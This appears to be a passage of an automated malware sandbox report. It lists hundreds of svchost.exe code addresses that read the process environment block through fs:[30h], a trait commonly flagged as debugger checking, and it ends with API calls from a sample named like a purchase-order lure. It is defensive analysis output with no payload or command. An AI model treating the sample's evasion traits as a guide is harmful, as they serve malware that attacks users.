            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]1_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]1_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]1_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]1_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]1_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]1_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]1_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]1_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]1_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]1_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]1_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]1_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]1_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]1_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]1_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]1_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]1_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]1_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]1_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]1_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]1_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]1_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]1_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]1_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]1_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]1_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]1_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]1_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]1_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]1_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]1_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]1_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]1_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]1_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]1_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]1_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]1_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]1_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]1_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]1_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]1_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]1_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]1_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]1_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]1_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]1_2_0345E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035008C0 mov eax, dword ptr fs:[00000030h]1_2_035008C0
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
